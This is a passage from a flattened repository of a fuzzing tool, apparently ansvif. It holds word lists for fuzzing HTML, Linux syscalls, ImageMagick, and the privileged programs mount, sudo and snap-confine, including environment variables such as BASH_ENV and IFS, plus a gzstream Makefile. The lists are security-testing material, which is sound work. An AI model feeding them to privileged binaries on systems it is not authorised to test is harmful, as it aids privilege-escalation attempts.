-O 16 | -P 17 | -Q 18 | -R 19 | -S 20 | -T 21 | -U 22 | -V 23 | -W 24 | -X 25 | -Y 26 | -Z 27 | -a 28 | -b 29 | -c 30 | -d 31 | -e 32 | -f 33 | -g 34 | -h 35 | -i 36 | -j 37 | -k 38 | -l 39 | -m 40 | -n 41 | -o 42 | -p 43 | -q 44 | -r 45 | -s 46 | -t 47 | -u 48 | -v 49 | -w 50 | -x 51 | -y 52 | -z 53 | -0 54 | -1 55 | -2 56 | -3 57 | -4 58 | -5 59 | -6 60 | -7 61 | -8 62 | -9 63 | -------------------------------------------------------------------------------- /examples/specific/htmltags.txt: -------------------------------------------------------------------------------- 1 | > 2 | % 3 | " 4 | = 5 | 6 | - 7 | + 8 | 0 9 | 1 10 | 100% 11 | <A 12 | abbr 13 | accept 14 | accept-charset 15 | accesskey 16 | action 17 | advisory 18 | align 19 | alink 20 | all 21 | alt 22 | applet 23 | <APPLET 24 | application/x-www-form-urlencoded 25 | archive 26 | AREA 27 | auto 28 | axis 29 | <B 30 | background 31 | <BASE 32 | <BASEFONT 33 | <BDO 34 | bgcolor 35 | <BLOCKQUOTE 36 | <BODY 37 | border 38 | bottom 39 | <BR 40 | bullet 41 | button 42 | <BUTTON 43 | <CAPTION 44 | <CDATA 45 | cell 46 | cellpadding 47 | cellspacing 48 | center 49 | char 50 | charoff 51 | charset 52 | checked 53 | cite 54 | class 55 | classid 56 | clear 57 | code 58 | codebase 59 | codetype 60 | <COL 61 | <COLGROUP 62 | color 63 | cols 64 | colspan 65 | column 66 | compact 67 | content 68 | coords 69 | data 70 | <DATA 71 | datetime 72 | declare 73 | default 74 | defer 75 | <DEL 76 | dir 77 | <DIR 78 | disabled 79 | <DIV 80 | <DL 81 | document 82 | enctype 83 | face 84 | field 85 | file 86 | focus 87 | <FONT 88 | for 89 | form 90 | <FORM 91 | frame 92 | <FRAME 93 | frameborder 94 | <FRAMESET 95 | GET 96 | <H1 97 | <H2 98 | <H3 99 | <H4 100 | <H5 101 | <H6 102 | <HEAD 103 | headers 104 | height 105 | <HR 106 | href 107 | hreflang 108 | hspace 109 | <HTML 110 | <HTTP 111 | http-equiv 112 | I 113 | id 114 | <ID 115 | <IDREF 116 | <IDREFS 117 | <IFRAME 118 | <IMG 119 | info 120 | <INPUT 121 | <INS 122 | <ISINDEX 123 | ismap 124 | item 125 | justify 126 | label 127 | LABEL 128 | lang 129 | language 130 | left 131 | <LEGEND 132 | length 133 | <LI 134 | link 135 | <LINK 136 | list 137 | loaded 138 | longdesc 139 | ltr 140 | <MAP 141 | marginheight 142 | marginwidth 143 | maxlength 144 | media 145 | <MENU 146 | message 147 | <META 148 | metainformation 149 | middle 150 | multiple 151 | name 152 | <NAME 153 | no 154 | nohref 155 | none 156 | noresize 157 | noshade 158 | nowrap 159 | number 160 | <NUMBER 161 | numbering 162 | object 163 | <OBJECT 164 | <OL 165 | onblur 166 | onchange 167 | onclick 168 | ondblclick 169 | onkeydown 170 | onkeyup 171 | onload 172 | onmousedown 173 | onmousemove 174 | onmouseout 175 | onmouseover 176 | onmouseup 177 | onreset 178 | onselect 179 | onsubmit 180 | onunload 181 | <OPTGROUP 182 | <OPTION 183 | order 184 | output 185 | <P 186 | <PARAM 187 | passwd 188 | <POST 189 | <PRE 190 | profile 191 | prompt 192 | <Q 193 | readonly 194 | <REF 195 | rel 196 | render 197 | reset 198 | right 199 | row 200 | rows 201 | rowspan 202 | rtl 203 | scheme 204 | <SCRIPT 205 | scrollbar 206 | scrolling 207 | select 208 | <SELECT 209 | selected 210 | sequence 211 | serialized 212 | size 213 | span 214 | speech 215 | src 216 | standby 217 | starting 218 | style 219 | <STYLE 220 | submit 221 | summary 222 | suppress 223 | tabbing 224 | tabindex 225 | table 226 | <TABLE 227 | target 228 | <TBODY 229 | <TD 230 | text 231 | <TEXT 232 | <TEXTAREA 233 | <TFOOT 234 | <TH 235 | <THEAD 236 | title 237 | <TITLE 238 | top 239 | <TR 240 | type 241 | <UL 242 | usemap 243 | visible 244 | vlink 245 | width 246 | word 247 | wrap 248 | yes 249 | -------------------------------------------------------------------------------- /examples/specific/http.txt: -------------------------------------------------------------------------------- 1 | http:// 2 | https:// 3 | -------------------------------------------------------------------------------- /examples/specific/linux_syscalls.list: -------------------------------------------------------------------------------- 1 | accept 2 | accept4 3 | access 4 | acct 5 | add_key 6 | adjtimex 7 | afs_syscall 8 | alarm 9 | alloc_hugepages 10 | arch_prctl 11 | arm_fadvise 12 | arm_fadvise64_64 13 | arm_sync_file_range 14 | bdflush 15 | bind 16 | bpf 17 | break 18 | brk 19 | cacheflush 20 | capget 21 | capset 22 | chdir 23 | chmod 24 | chown 25 | chown32 26 | chroot 27 | clock_getres 28 | clock_gettime 29 | clock_nanosleep 30 | clock_settime 31 | __clone2 32 | clone2 33 | clone 34 | close 35 | connect 36 | creat 37 | create_module 38 | delete_module 39 | dup2 40 | dup 41 | dup3 42 | epoll_create1 43 | epoll_create 44 | epoll_ctl 45 | epoll_pwait 46 | epoll_wait 47 | eventfd2 48 | eventfd 49 | execve 50 | execveat 51 | _exit 52 | exit 53 | _Exit 54 | exit_group 55 | faccessat 56 | fadvise64 57 | fadvise64_64 58 | fallocate 59 | fanotify_init 60 | fanotify_mark 61 | fattach 62 | fchdir 63 | fchmod 64 | fchmodat 65 | fchown 66 | fchown32 67 | fchownat 68 | fcntl 69 | fcntl64 70 | fdatasync 71 | fdetach 72 | finit_module 73 | flock 74 | fork 75 | free_hugepages 76 | fstat 77 | fstat64 78 | fstatat 79 | fstatat64 80 | fstatfs 81 | fstatfs64 82 | fstatvfs 83 | fsync 84 | ftruncate 85 | ftruncate64 86 | futex 87 | futimesat 88 | getcontext 89 | getcpu 90 | getcwd 91 | getdents 92 | getdents64 93 | getdomainname 94 | getdtablesize 95 | getegid 96 | getegid32 97 | geteuid 98 | geteuid32 99 | getgid 100 | getgid32 101 | getgroups 102 | getgroups32 103 | gethostid 104 | gethostname 105 | getitimer 106 | get_kernel_syms 107 | get_mempolicy 108 | getmsg 109 | getpagesize 110 | getpeername 111 | getpgid 112 | getpgrp 113 | getpid 114 | getpmsg 115 | getppid 116 | getpriority 117 | getrandom 118 | getresgid 119 | getresgid32 120 | getresuid 121 | getresuid32 122 | getrlimit 123 | get_robust_list 124 | getrusage 125 | getsid 126 | getsockname 127 | getsockopt 128 | get_thread_area 129 | gettid 130 | gettimeofday 131 | getuid 132 | getuid32 133 | getunwind 134 | gtty 135 | idle 136 | inb 137 | inb_p 138 | init_module 139 | inl 140 | inl_p 141 | inotify_add_watch 142 | inotify_init1 143 | inotify_init 144 | inotify_rm_watch 145 | insb 146 | insl 147 | insw 148 | intro 149 | inw 150 | inw_p 151 | io_cancel 152 | ioctl 153 | ioctl_fat 154 | ioctl_list 155 | io_destroy 156 | io_getevents 157 | ioperm 158 | iopl 159 | ioprio_get 160 | ioprio_set 161 | io_setup 162 | io_submit 163 | ipc 164 | isastream 165 | kcmp 166 | kexec_file_load 167 | kexec_load 168 | keyctl 169 | kill 170 | killpg 171 | lchown 172 | lchown32 173 | link 174 | linkat 175 | listen 176 | _llseek 177 | llseek 178 | lock 179 | lookup_dcookie 180 | lseek 181 | lstat 182 | lstat64 183 | madvise1 184 | madvise 185 | mbind 186 | membarrier 187 | memfd_create 188 | migrate_pages 189 | mincore 190 | mkdir 191 | mkdirat 192 | mknod 193 | mknodat 194 | mlock2 195 | mlock 196 | mlockall 197 | mmap2 198 | mmap 199 | modify_ldt 200 | mount 201 | move_pages 202 | mprotect 203 | mpx 204 | mq_getsetattr 205 | mq_notify 206 | mq_open 207 | mq_timedreceive 208 | mq_timedsend 209 | mq_unlink 210 | mremap 211 | msgctl 212 | msgget 213 | msgop 214 | msgrcv 215 | msgsnd 216 | msync 217 | munlock 218 | munlockall 219 | munmap 220 | name_to_handle_at 221 | nanosleep 222 | newfstatat 223 | _newselect 224 | nfsservctl 225 | nice 226 | oldfstat 227 | oldlstat 228 | oldolduname 229 | oldstat 230 | olduname 231 | open 232 | openat 233 | open_by_handle_at 234 | outb 235 | outb_p 236 | outl 237 | outl_p 238 | outsb 239 | outsl 240 | outsw 241 | outw 242 | outw_p 243 | pause 244 | pciconfig_iobase 245 | pciconfig_read 246 | pciconfig_write 247 | perf_event_open 248 | perfmonctl 249 | personality 250 | phys 251 | pipe2 252 | pipe 253 | pivot_root 254 | poll 255 | posix_fadvise 256 | ppoll 257 | prctl 258 | pread 259 | pread64 260 | preadv 261 | prlimit 262 | prlimit64 263 | process_vm_readv 264 | process_vm_writev 265 | prof 266 | pselect 267 | pselect6 268 | ptrace 269 | putmsg 270 | putpmsg 271 | pwrite 272 | pwrite64 273 | pwritev 274 | query_module 275 | quotactl 276 | read 277 | readahead 278 | readdir 279 | readlink 280 | readlinkat 281 | readv 282 | reboot 283 | recv 284 | recvfrom 285 | recvmmsg 286 | recvmsg 287 | remap_file_pages 288 | rename 289 | renameat2 290 | renameat 291 | request_key 292 | restart_syscall 293 | rmdir 294 | rt_sigaction 295 | rt_sigpending 296 | rt_sigprocmask 297 | rt_sigqueueinfo 298 | rt_sigreturn 299 | rt_sigsuspend 300 | rt_sigtimedwait 301 | rt_tgsigqueueinfo 302 | s390_pci_mmio_read 303 | s390_pci_mmio_write 304 | s390_runtime_instr 305 | sbrk 306 | sched_getaffinity 307 | sched_getattr 308 | sched_getparam 309 | sched_get_priority_max 310 | sched_get_priority_min 311 | sched_getscheduler 312 | sched_rr_get_interval 313 | sched_setaffinity 314 | sched_setattr 315 | sched_setparam 316 | sched_setscheduler 317 | sched_yield 318 | seccomp 319 | security 320 | select 321 | select_tut 322 | semctl 323 | semget 324 | semop 325 | semtimedop 326 | send 327 | sendfile 328 | sendfile64 329 | sendmmsg 330 | sendmsg 331 | sendto 332 | setcontext 333 | setdomainname 334 | setegid 335 | seteuid 336 | setfsgid 337 | setfsgid32 338 | setfsuid 339 | setfsuid32 340 | setgid 341 | setgid32 342 | setgroups 343 | setgroups32 344 | sethostid 345 | sethostname 346 | setitimer 347 | set_mempolicy 348 | setns 349 | setpgid 350 | setpgrp 351 | setpriority 352 | setregid 353 | setregid32 354 | setresgid 355 | setresgid32 356 | setresuid 357 | setresuid32 358 | setreuid 359 | setreuid32 360 | setrlimit 361 | set_robust_list 362 | setsid 363 | setsockopt 364 | set_thread_area 365 | set_tid_address 366 | settimeofday 367 | setuid 368 | setuid32 369 | setup 370 | sgetmask 371 | shmat 372 | shmctl 373 | shmdt 374 | shmget 375 | shmop 376 | shutdown 377 | sigaction 378 | sigaltstack 379 | signal 380 | signalfd 381 | signalfd4 382 | sigpending 383 | sigprocmask 384 | sigqueue 385 | sigreturn 386 | sigsuspend 387 | sigtimedwait 388 | sigwaitinfo 389 | socket 390 | socketcall 391 | socketpair 392 | splice 393 | spu_create 394 | spu_run 395 | ssetmask 396 | stat 397 | stat64 398 | statfs 399 | statfs64 400 | statvfs 401 | stime 402 | stty 403 | subpage_prot 404 | swapoff 405 | swapon 406 | symlink 407 | symlinkat 408 | sync 409 | sync_file_range2 410 | sync_file_range 411 | syncfs 412 | _syscall 413 | syscall 414 | syscalls 415 | _sysctl 416 | sysctl 417 | sysfs 418 | sysinfo 419 | syslog 420 | tee 421 | tgkill 422 | time 423 | timer_create 424 | timer_delete 425 | timerfd_create 426 | timerfd_gettime 427 | timerfd_settime 428 | timer_getoverrun 429 | timer_gettime 430 | timer_settime 431 | times 432 | tkill 433 | truncate 434 | truncate64 435 | tuxcall 436 | ugetrlimit 437 | umask 438 | umount2 439 | umount 440 | uname 441 | unimplemented 442 | unlink 443 | unlinkat 444 | unshare 445 | uselib 446 | ustat 447 | utime 448 | utimensat 449 | utimes 450 | vfork 451 | vhangup 452 | vm86 453 | vm86old 454 | vmsplice 455 | vserver 456 | wait 457 | wait3 458 | wait4 459 | waitid 460 | waitpid 461 | write 462 | writev 463 | -------------------------------------------------------------------------------- /examples/specific/linux_syscalls_implemented.list: -------------------------------------------------------------------------------- 1 | accept 2 | accept4 3 | access 4 | acct 5 | alarm 6 | bind 7 | bpf 8 | capget 9 | capset 10 | chdir 11 | chmod 12 | chroot 13 | clock_getres 14 | clock_gettime 15 | clock_nanosleep 16 | clock_settime 17 | clone 18 | connect 19 | dup 20 | dup2 21 | dup3 22 | epoll_create 23 | epoll_create1 24 | epoll_ctl 25 | epoll_pwait 26 | epoll_wait 27 | eventfd 28 | faccessat 29 | fallocate 30 | fanotify_init 31 | posix_fadvise 32 | fchdir 33 | fchmodat 34 | fchown 35 | fchownat 36 | fdatasync 37 | flock 38 | fstat 39 | fstatat 40 | fstatfs 41 | fsync 42 | ftruncate 43 | futimesat 44 | getcwd 45 | getegid 46 | getgid 47 | -------------------------------------------------------------------------------- /examples/specific/math.txt: -------------------------------------------------------------------------------- 1 | 2 | + 3 | - 4 | * 5 | / 6 | -------------------------------------------------------------------------------- /examples/specific/mogrify_t.txt: -------------------------------------------------------------------------------- 1 | -affine 2 | -alpha 3 | -antialias 4 | -authenticate 5 | -attenuate 6 | -background 7 | -bias 8 | -black-point-compensation 9 | -blue-primary 10 | -bordercolor 11 | -caption 12 | -cdl 13 | -channel 14 | -colors 15 | -colorspace 16 | -comment 17 | -compose 18 | -compress 19 | -decipher 20 | -define 21 | -delay 22 | -density 23 | -depth 24 | -direction 25 | -display 26 | -dispose 27 | -dither 28 | -encipher 29 | -encoding 30 | -endian 31 | -family 32 | -features 33 | -fill 34 | -filter 35 | -flatten 36 | -font 37 | -format 38 | -function 39 | -fuzz 40 | -gravity 41 | -green-primary 42 | -intensity 43 | -intent 44 | -interlace 45 | -interline-spacing 46 | -interpolate 47 | -interword-spacing 48 | -kerning 49 | -label 50 | -limit 51 | -loop 52 | -mask 53 | -matte 54 | -mattecolor 55 | -metric 56 | -monitor 57 | -morphology 58 | -orient 59 | -page 60 | -path 61 | -ping 62 | -pointsize 63 | -precision 64 | -preview 65 | -quality 66 | -quiet 67 | -red-primary 68 | -regard-warnings 69 | -remap 70 | -respect-parentheses 71 | -sampling-factor 72 | -scene 73 | -seed 74 | -size 75 | -stretch 76 | -stroke 77 | -strokewidth 78 | -style type 79 | -synchronize 80 | -taint 81 | -texture 82 | -tile-offset 83 | -treedepth 84 | -transparent-color 85 | -undercolor 86 | -units 87 | -verbose 88 | -view 89 | -virtual-pixel 90 | -weight 91 | -white-point 92 | -adaptive-blur 93 | -adaptive-resize 94 | -adaptive-sharpen 95 | -alpha 96 | -annotate 97 | -auto-gamma 98 | -auto-level 99 | -auto-orient 100 | -bench iterations 101 | -black-threshold 102 | -blue-shift 103 | -blur 104 | -border 105 | -bordercolor 106 | -brightness-contrast 107 | -cdl 108 | -canny 109 | -charcoal 110 | -chop 111 | -clamp 112 | -clip 113 | -clip-mask 114 | -clip-path 115 | -colorize 116 | -color-matrix 117 | -connected-component 118 | -contrast 119 | -contrast-stretch 120 | -convolve 121 | -cycle 122 | -decipher 123 | -deskew 124 | -despeckle 125 | -distort 126 | -draw 127 | -edge 128 | -encipher 129 | -emboss 130 | -enhance 131 | -equalize 132 | -evaluate 133 | -extent 134 | -extract 135 | -features 136 | -fft 137 | -flip 138 | -floodfill 139 | -flop 140 | -frame 141 | -function 142 | -gamma 143 | -gaussian-blur 144 | -geometry 145 | -grayscale 146 | -ift 147 | -hough-lines 148 | -identify 149 | -ift 150 | -implode 151 | -lat 152 | -layers 153 | -level 154 | -level-colors 155 | -linear-stretch 156 | -liquid-rescale 157 | -magnify 158 | -mean-shift 159 | -median 160 | -mode 161 | -modulate 162 | -monochrome 163 | -morphology 164 | -motion-blur 165 | -negate 166 | -noise 167 | -normalize 168 | -opaque 169 | -ordered-dither 170 | -paint 171 | -perceptible 172 | -polaroid 173 | -posterize 174 | -print 175 | -profile 176 | -quantize 177 | -radial-blur 178 | -raise 179 | -random-threshold 180 | -region 181 | -render 182 | -repage 183 | -resample 184 | -resize 185 | -roll 186 | -rotate 187 | -sample 188 | -scale 189 | -segment 190 | -selective-blur 191 | -sepia-tone 192 | -set property 193 | -shade degrees 194 | -shadow 195 | -sharpen 196 | -shave 197 | -shear 198 | -sigmoidal-contrast 199 | -sketch 200 | -solarize 201 | -sparse-color 202 | -splice 203 | -spread 204 | -statistic 205 | -strip 206 | -swirl 207 | -threshold 208 | -thumbnail 209 | -tile 210 | -tint 211 | -transform 212 | -transparent 213 | -transpose 214 | -transverse 215 | -trim 216 | -type 217 | -unique-colors 218 | -unsharp 219 | -vignette 220 | -wave 221 | -white-threshold 222 | -affinity 223 | -append 224 | -clut 225 | -coalesce 226 | -combine 227 | -compare 228 | -complex 229 | -composite 230 | -crop 231 | -deconstruct 232 | -evaluate-sequence 233 | -flatten 234 | -fx 235 | -hald-clut 236 | -morph 237 | -mosaic 238 | -poly 239 | -process 240 | -separate 241 | -smush 242 | -delete 243 | -duplicate 244 | -insert 245 | -reverse 246 | -swap 247 | -debug 248 | -distribute-cache 249 | -log 250 | -list 251 | -------------------------------------------------------------------------------- /examples/specific/mount_e.txt: -------------------------------------------------------------------------------- 1 | LANG= 2 | LANGUAGE= 3 | BASH_ENV= 4 | HOME= 5 | IFS= 6 | KRB_CONF= 7 | LIBPATH= 8 | MAIL= 9 | NLSPATH= 10 | SHELL= 11 | SHLIB_PATH= 12 | -------------------------------------------------------------------------------- /examples/specific/mount_o.txt: -------------------------------------------------------------------------------- 1 | remount 2 | ro 3 | bind 4 | adfs 5 | affs 6 | autofs 7 | btrfs 8 | cifs 9 | coda 10 | coherent 11 | cramfs 12 | debugfs 13 | devpts 14 | efs 15 | ext 16 | ext2 17 | ext3 18 | ext4 19 | hfs 20 | hfsplus 21 | hpfs 22 | iso9660 23 | jfs 24 | minix 25 | msdos 26 | ncpfs 27 | nfs 28 | nfs4 29 | ntfs 30 | proc 31 | qnx4 32 | ramfs 33 | reiserfs 34 | romfs 35 | squashfs 36 | smbfs 37 | sysv 38 | tmpfs 39 | ubifs 40 | udf 41 | ufs 42 | umsdos 43 | usbfs 44 | vfat 45 | xenix 46 | xfs 47 | xiafs 48 | nomsdos 49 | no_netdev 50 | _netdev 51 | noatime 52 | nodev 53 | nosuid 54 | async 55 | noauto 56 | atime 57 | noatime 58 | noauto 59 | context= 60 | fscontext= 61 | defcontext= 62 | rootcontext= 63 | defaults 64 | dev 65 | nodev 66 | diratime 67 | nodiratime 68 | dirsync 69 | exec 70 | noexec 71 | group 72 | iversion 73 | noiversion 74 | mand 75 | nomand 76 | _netdev 77 | nofail 78 | relatime 79 | strictatime 80 | nostrictatime 81 | suid 82 | nosuid 83 | silent 84 | loud 85 | owner 86 | remount 87 | ro 88 | rw 89 | user 90 | nouser 91 | users 92 | uid= 93 | ownmask= 94 | gid= 95 | othmask= 96 | suid= 97 | setgid= 98 | mode= 99 | protect 100 | usemp 101 | verbose 102 | prefix= 103 | volume= 104 | reserved= 105 | root= 106 | bs= 107 | grpquota 108 | noquota 109 | quota 110 | usrquota 111 | alloc_start= 112 | autodefrag 113 | check_int= 114 | check_int_data= 115 | check_int_print_mask= 116 | commit= 117 | compress 118 | compress= 119 | zlib 120 | lzo 121 | no 122 | compress-force 123 | compress-force= 124 | degraded 125 | device= 126 | discard 127 | enospc_debug 128 | fatal_errors= 129 | flushoncommit 130 | inode_cache 131 | max_inline= 132 | metadata_ratio= 133 | noacl 134 | nobarrier 135 | nodatacow 136 | nodatasum 137 | notreelog 138 | recovery 139 | rescan_uuid_tree 140 | scip_balance 141 | nospace_cache 142 | ssd 143 | nossd 144 | ssd_spread 145 | subvol= 146 | subvolid= 147 | subvolrootid= 148 | thread_pool= 149 | user_subvol_rm_allowed 150 | newinstance 151 | ptmxmode= 152 | bsddf 153 | minixdf 154 | check= 155 | none 156 | nocheck 157 | debug 158 | errors= 159 | continue 160 | remount-ro 161 | panic 162 | grpid 163 | gsdgroups 164 | nogrpid 165 | sysvgroups 166 | resgid= 167 | resuid= 168 | sb= 169 | user_xattr 170 | nouser_xattr 171 | journal= 172 | update 173 | inum 174 | journal_dev 175 | norecovery 176 | noload 177 | ordered 178 | writeback 179 | data= 180 | data_err 181 | ignore 182 | abort 183 | barrier=1 184 | barrier=0 185 | barrier= 186 | commit= 187 | oldalloc 188 | sysvgroups 189 | usrjquota 190 | grpjquota 191 | orlov 192 | nobarrier 193 | barrier 194 | inode_readahead_blks= 195 | stripe= 196 | dealloc 197 | nodealloc 198 | max_bath_time= 199 | min_batch_time= 200 | journal_ioprio= 201 | abort 202 | auto_da_alloc 203 | noauto_da_alloc 204 | noinit_itable 205 | init_itable= 206 | nouid32 207 | block_validity 208 | noblock_validity 209 | max_dir_size_kb= 210 | i_version 211 | blocksize= 212 | uid= 213 | umask= 214 | dmask= 215 | fmask= 216 | allow_utime= 217 | check= 218 | r 219 | n 220 | s 221 | codepage= 222 | conv= 223 | b 224 | t 225 | a 226 | cvf_format= 227 | cvf_option= 228 | fat 229 | iocharset= 230 | nfs 231 | tz=UTC 232 | quiet 233 | showexec 234 | sys_immutable 235 | flush 236 | usefree 237 | dots 238 | nodots 239 | dotsOK= 240 | yes 241 | no 242 | creator= 243 | type= 244 | session= 245 | part= 246 | case= 247 | lower 248 | asis 249 | norock 250 | nojoliet 251 | map= 252 | n 253 | o 254 | unhide 255 | block= 256 | conv= 257 | m 258 | t 259 | cruft 260 | absector= 261 | iocharset= 262 | utf8 263 | resize= 264 | nointegrity 265 | integrity 266 | posix=0 267 | posix=1 268 | posix= 269 | uni_xlate=1 270 | uni_xlate=2 271 | uni_xlate=3 272 | uni_xlate= 273 | hash 274 | rupasov 275 | tea 276 | r5 277 | detect 278 | hash_relocation 279 | no_unhashed_relocation 280 | noborder 281 | nolog 282 | notail 283 | replayonly 284 | acl 285 | user_xattr 286 | barrier= 287 | none 288 | flush 289 | size= 290 | nr_blocks= 291 | nr_inodes= 292 | mode= 293 | mpol 294 | prefer:Node 295 | bind:NodeList 296 | interleave 297 | interleave:NodeList 298 | bulk_read 299 | no_bulk_read 300 | chk_data_crc 301 | no_chk_data_crc 302 | compr= 303 | bs= 304 | partition= 305 | lastblock= 306 | fileset= 307 | rootdir= 308 | ufstype= 309 | 44bsd 310 | old 311 | ufs2 312 | 5xbsd 313 | sun 314 | sunx86 315 | hp 316 | nextstep 317 | nextsetp-cd 318 | openstep 319 | onerror= 320 | uni_xlate 321 | shortname= 322 | win95 323 | winnt 324 | mixed 325 | attr2 326 | noattr2 327 | largeio 328 | nolargeio 329 | logbufs= 330 | logbsize= 331 | logdev= 332 | noalign 333 | nouuid 334 | pquota 335 | prjquota 336 | pqnoenforce 337 | sunit= 338 | swidth= 339 | swolloc 340 | wsync 341 | loop 342 | -------------------------------------------------------------------------------- /examples/specific/mount_t.txt: -------------------------------------------------------------------------------- 1 | --bind 2 | --fstab 3 | --source 4 | --target 5 | -F 6 | -O 7 | -a 8 | -f 9 | -o 10 | -r 11 | -t 12 | -v 13 | -i 14 | -l 15 | -c 16 | -s 17 | -a 18 | --source 19 | --target 20 | -r 21 | -w 22 | --rw 23 | --read-write 24 | -U 25 | -T 26 | -t 27 | --make-rshared 28 | --make-rslave 29 | --make-rprivate 30 | --make-runbindable 31 | -B 32 | -R 33 | -M 34 | -------------------------------------------------------------------------------- /examples/specific/networking.txt: -------------------------------------------------------------------------------- 1 | 192.168.0.1 2 | 127.0.0.1 3 | 0.0.0.0 4 | 8.8.8.8 5 | ipv4 6 | ipv6 7 | -------------------------------------------------------------------------------- /examples/specific/sample.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/examples/specific/sample.gif -------------------------------------------------------------------------------- /examples/specific/sample.mkv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/examples/specific/sample.mkv -------------------------------------------------------------------------------- /examples/specific/snap-confine_e.txt: -------------------------------------------------------------------------------- 1 | SNAP_CONFINE_DEBUG= 2 | SNAP_LAUNCHER_INSIDE_TESTS= 3 | SNAP_CONFINE_NO_ROOT= 4 | SNAPPY_LAUNCHER_SECCOMP_PROFILE_DIR= 5 | SNAP_USER_DATA= 6 | SNAP_CONFINE_NS_DIR= 7 | -------------------------------------------------------------------------------- /examples/specific/snap-profile: -------------------------------------------------------------------------------- 1 | snap.a. 2 | -------------------------------------------------------------------------------- /examples/specific/space.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /examples/specific/sudo.txt: -------------------------------------------------------------------------------- 1 | -A 2 | -B 3 | -C 4 | -E 5 | -e 6 | -g 7 | -H 8 | -h 9 | -i 10 | -K 11 | -k 12 | -l 13 | -n 14 | -P 15 | -p 16 | -r 17 | -S 18 | -s 19 | -t 20 | -U 21 | -u 22 | -V 23 | -v 24 | -------------------------------------------------------------------------------- /examples/specific/test-win.txt: -------------------------------------------------------------------------------- 1 | --test-win -------------------------------------------------------------------------------- /icons/icon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/icons/icon.ico -------------------------------------------------------------------------------- /icons/icon.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/icons/icon.jpg -------------------------------------------------------------------------------- /include/gzstream/.deps/.dirstamp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/include/gzstream/.deps/.dirstamp -------------------------------------------------------------------------------- /include/gzstream/.dirstamp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/include/gzstream/.dirstamp -------------------------------------------------------------------------------- /include/gzstream/.gitignore: -------------------------------------------------------------------------------- 1 | *.[oa] 2 | -------------------------------------------------------------------------------- /include/gzstream/Makefile: -------------------------------------------------------------------------------- 1 | # ============================================================================ 2 | # gzstream, C++ iostream classes wrapping the zlib compression library. 3 | # Copyright (C) 2001 Deepak Bandyopadhyay, Lutz Kettner 4 | # 5 | # This library is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 2.1 of the License, or (at your option) any later version. 9 | # 10 | # This library is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public 16 | # License along with this library; if not, write to the Free Software 17 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 18 | # ============================================================================ 19 | # 20 | # File : Makefile 21 | # Revision : $Revision: 1.3 $ 22 | # Revision_date : $Date: 2001/10/04 15:09:28 $ 23 | # Author(s) : Deepak Bandyopadhyay, Lutz Kettner 24 | # 25 | # ============================================================================ 26 | 27 | # ---------------------------------------------------------------------------- 28 | # adapt these settings to your need: 29 | # add '-DGZSTREAM_NAMESPACE=name' to CPPFLAGS to place the classes 30 | # in its own namespace. Note, this macro needs to be set while creating 31 | # the library as well while compiling applications based on it. 32 | # As an alternative, gzstream.C and gzstream.h can be edited. 33 | # ---------------------------------------------------------------------------- 34 | 35 | # CXX = CC -n32 -LANG:std # for SGI Irix 6.5, MIPSpro CC version 7.30 36 | CXX = g++ # for Linux RedHat 6.1, g++ version 2.95.2 37 | 38 | CPPFLAGS = -I. -O -D __KALI__ 39 | LDFLAGS = -L. -lgzstream -lz 40 | AR = ar cr 41 | 42 | # ---------------------------------------------------------------------------- 43 | # plain simple rules to make and cleanup the library: 44 | # make default; compiles the library 45 | # make test; compiles and executes test. O.K. message marks success. 46 | # make clean; removes temporary files 47 | # make cleanall; removes temporary files, the library, and programs 48 | # ---------------------------------------------------------------------------- 49 | 50 | all: libgzstream.a 51 | 52 | test: test_gzip test_gunzip 53 | ./test_gzip COPYING.LIB gz.tmp.gz 54 | gunzip gz.tmp.gz 55 | diff COPYING.LIB gz.tmp 56 | gzip gz.tmp 57 | ./test_gunzip gz.tmp.gz gz.tmp 58 | diff COPYING.LIB gz.tmp 59 | rm gz.tmp.gz gz.tmp 60 | # *** O.K. Test finished successfully. *** 61 | 62 | gzstream.o : gzstream.cpp gzstream.h 63 | ${CXX} ${CPPFLAGS} -c -o gzstream.o gzstream.cpp 64 | 65 | test_gzip.o : test_gzip.C gzstream.h 66 | ${CXX} ${CPPFLAGS} -c -o test_gzip.o test_gzip.C 67 | 68 | test_gunzip.o : test_gunzip.C gzstream.h 69 | ${CXX} ${CPPFLAGS} -c -o test_gunzip.o test_gunzip.C 70 | 71 | libgzstream.a : gzstream.o 72 | ${AR} libgzstream.a gzstream.o 73 | cp libgzstream.a ../../ 74 | 75 | test_gzip : test_gzip.o libgzstream.a 76 | ${CXX} -o test_gzip test_gzip.o ${LDFLAGS} 77 | 78 | test_gunzip : test_gunzip.o libgzstream.a 79 | ${CXX} -o test_gunzip test_gunzip.o ${LDFLAGS} 80 | 81 | clean : 82 | rm *.o 83 | 84 | cleanall : 85 | rm *.o libgzstream.a test_gzip test_gunzip 86 | 87 | # ============================================================================ 88 | # EOF 89 | 90 | -------------------------------------------------------------------------------- /include/gzstream/README: -------------------------------------------------------------------------------- 1 | 2 | gzstream 3 | C++ iostream classes wrapping the zlib compression library. 4 | =========================================================================== 5 | 6 | See index.html for documentation and installation instructions. 7 | -------------------------------------------------------------------------------- /include/gzstream/gzstream.cpp: -------------------------------------------------------------------------------- 1 | // ============================================================================ 2 | // gzstream, C++ iostream classes wrapping the zlib compression library. 3 | // Copyright (C) 2001 Deepak Bandyopadhyay, Lutz Kettner 4 | // 5 | // This library is free software; you can redistribute it and/or 6 | // modify it under the terms of 